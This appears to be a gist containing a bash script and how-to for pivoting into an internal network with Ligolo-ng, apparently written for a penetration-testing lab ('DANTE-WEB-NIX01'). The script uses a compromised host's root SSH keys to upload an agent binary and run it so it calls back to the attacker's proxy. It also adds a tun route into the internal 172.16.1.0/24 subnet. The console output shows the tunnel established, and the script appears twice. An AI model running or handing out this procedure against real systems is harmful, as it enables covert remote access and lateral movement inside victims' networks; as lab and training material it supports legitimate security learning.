V3ntus/automate_pivot.sh

## automate_pivot.sh
#!/bin/bash
# If you do not have ssh keys for root, remove all -i flag and $REMOTE_ROOT_KEYS instances from the script

REMOTE= # IP/hostname of remote target
REMOTE_ROOT_KEYS= # path to id_rsa of root user on remote target
LIGOLO_AGENT= # path to agent binary
LIGOLO_PROXY= # path to proxy binary
CURRENT_USER=$(whoami)

echo "[L] Uploading agent to remote..."
scp -i $REMOTE_ROOT_KEYS $LIGOLO_AGENT root@$REMOTE:/root/.ligolo_agent
echo "[L] Uploaded"
echo "[L] Setting up tun interface on this device..."
if [[ -z $(ifconfig | grep "ligolo") ]]; then
        sudo ip tuntap add user $CURRENT_USER mode tun ligolo
        sudo ip link set ligolo up
        sudo ip route add 172.16.1.0/24 dev ligolo
fi

echo "[L] Starting agent on remote..."
VPN_IP=$(ifconfig tun0 | grep inet | grep -Eo "10.10.[0-9]{,2}.[0-9]{,3}" | head -1)
echo "[L] Got VPN IP: $VPN_IP"
ssh -i $REMOTE_ROOT_KEYS root@$REMOTE "echo '[R] Hello from remote. Connecting in 3 seconds'; sleep 3; /root/.ligolo_agent -connect $VPN_IP:11601 -ignore-cert" &

echo "[L] Starting proxy..."
echo "[L] Run 'session', select your session, then run 'start' to finish tunneling"
sudo $LIGOLO_PROXY -selfcert

## ligolo-ng_how-to.md

      
    Raw
  

              ligolo-ng_how-to.md
            
          
    Tunneling with Ligolo-ng

Setup

1. Download both agent and proxy from the releases here. Extract them someplace.
2. On your attacking machine, setup the ligolo tun interface:
sudo ip tuntap add user [your username] mode tun ligolo
sudo ip link set ligolo up
sudo ip route add [subnet network address]/[subnet CIDR] dev ligolo

For example, for my machine, I would type:

sudo ip tuntap add user ventus mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo
Running

1. Start your proxy server on your attacking machine with:
sudo ./proxy -selfcert

If you get invalid domain/host name issues, you missed the “-selfcert” argument.

2. Now upload the agent binary to your compromised machine on the network. Connect to your proxy/C2 server with:
./agent -connect [your attacking machine's IP]:11601 -ignore-cert

Also note the “-ignore-cert” argument. You should see a connection in your proxy terminal.

3. You should see a connection in your attacking/proxy machine.
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng » INFO[0001] Agent joined.                                 name=root@DANTE-WEB-NIX01 remote="10.10.110.100:38078"

4. At your attacking/proxy machine, configure tunneling with this new session.

Enter session, hit Enter to select the newly created session, then hit start.

ligolo-ng » session
? Specify a session : 1 - root@DANTE-WEB-NIX01 - 10.10.110.100:38078
[Agent : root@DANTE-WEB-NIX01] » ifconfig
┌────────────────────────────┐
│ Interface 0                │
├──────────────┬─────────────┤
│ Name         │ lo          │
│ Hardware MAC │             │
│ MTU          │ 65536       │
│ Flags        │ up|loopback │
│ IPv4 Address │ 127.0.0.1/8 │
│ IPv6 Address │ ::1/128     │
└──────────────┴─────────────┘
┌────────────────────────────────────────────┐
│ Interface 1                                │
├──────────────┬─────────────────────────────┤
│ Name         │ eth0                        │
│ Hardware MAC │ 00:50:56:b9:9b:fe           │
│ MTU          │ 1500                        │
│ Flags        │ up|broadcast|multicast      │
│ IPv4 Address │ 172.16.1.100/24             │
│ IPv6 Address │ fe80::250:56ff:feb9:9bfe/64 │
└──────────────┴─────────────────────────────┘
[Agent : root@DANTE-WEB-NIX01] » start
[Agent : root@DANTE-WEB-NIX01] » INFO[0114] Starting tunnel to root@DANTE-WEB-NIX01 
Now you should be good to go!

You should be able to nmap the remote internal subnet without any issues or need for TCP flags.
	#!/bin/bash
	# If you do not have ssh keys for root, remove all -i flag and $REMOTE_ROOT_KEYS instances from the script

	REMOTE= # IP/hostname of remote target
	REMOTE_ROOT_KEYS= # path to id_rsa of root user on remote target
	LIGOLO_AGENT= # path to agent binary
	LIGOLO_PROXY= # path to proxy binary
	CURRENT_USER=$(whoami)

	echo "[L] Uploading agent to remote..."
	scp -i $REMOTE_ROOT_KEYS $LIGOLO_AGENT root@$REMOTE:/root/.ligolo_agent
	echo "[L] Uploaded"
	echo "[L] Setting up tun interface on this device..."
	if [[ -z $(ifconfig \| grep "ligolo") ]]; then
	sudo ip tuntap add user $CURRENT_USER mode tun ligolo
	sudo ip link set ligolo up
	sudo ip route add 172.16.1.0/24 dev ligolo
	fi

	echo "[L] Starting agent on remote..."
	VPN_IP=$(ifconfig tun0 \| grep inet \| grep -Eo "10.10.[0-9]{,2}.[0-9]{,3}" \| head -1)
	echo "[L] Got VPN IP: $VPN_IP"
	ssh -i $REMOTE_ROOT_KEYS root@$REMOTE "echo '[R] Hello from remote. Connecting in 3 seconds'; sleep 3; /root/.ligolo_agent -connect $VPN_IP:11601 -ignore-cert" &

	echo "[L] Starting proxy..."
	echo "[L] Run 'session', select your session, then run 'start' to finish tunneling"
	sudo $LIGOLO_PROXY -selfcert